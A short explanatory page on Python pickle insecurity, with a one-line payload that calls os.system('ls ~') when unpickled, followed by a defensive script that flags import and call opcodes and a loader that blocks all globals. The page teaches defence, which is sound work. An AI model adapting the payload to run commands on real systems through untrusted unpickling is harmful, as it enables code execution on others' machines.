Python pickle is insecure
Pickle uses a simple stack-based virtual machine that records the instructions used to rebuild an object.
import pickle
# The payload must be bytes on Python 3 (the original used a Python 2 str).
pickle.loads(b"cos\nsystem\n(S'ls ~'\ntR.")  # This will run: ls ~
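Because a pickle is a program for that stack machine, it can be disassembled without being executed. The following is an added example, not code from the original page or the linked articles: it uses the standard library's pickletools to list the opcodes that import or call objects, and an Unpickler subclass that refuses every global. The names risky_opcodes, DenyGlobals and safe_loads are chosen here for illustration, and the benign sample is constructed.

```python
import io
import pickle
import pickletools

# Opcodes that import a callable or invoke one while the pickle is loading.
RISKY = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ",
         "NEWOBJ", "NEWOBJ_EX", "REDUCE", "BUILD"}


def risky_opcodes(data: bytes):
    """Disassemble without executing; return (opcode, arg) pairs that import or call."""
    return [(op.name, arg)
            for op, arg, _pos in pickletools.genops(data)
            if op.name in RISKY]


class DenyGlobals(pickle.Unpickler):
    """Unpickler that refuses every import, so only plain built-in data loads."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def safe_loads(data: bytes):
    """Load a pickle with all global lookups denied."""
    return DenyGlobals(io.BytesIO(data)).load()


# The payload shown on this page, as bytes.
PAYLOAD = b"cos\nsystem\n(S'ls ~'\ntR."
# Constructed benign sample containing only built-in types.
BENIGN = pickle.dumps([1, "a", {"k": 2}])

if __name__ == "__main__":
    print("payload:", risky_opcodes(PAYLOAD))  # GLOBAL 'os system', then REDUCE
    print("benign: ", risky_opcodes(BENIGN))   # nothing flagged
    print("benign loads as:", safe_loads(BENIGN))
    try:
        safe_loads(PAYLOAD)
    except pickle.UnpicklingError as exc:
        print("payload rejected:", exc)
```

The opcode listing is a triage aid; for data from an untrusted source, the dependable fix is a format that cannot express calls, such as JSON.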
Links:
http://nadiana.com/python-pickle-insecure
http://www.owasp.org.cn/OWASP_Events/download/PythonHack.pdf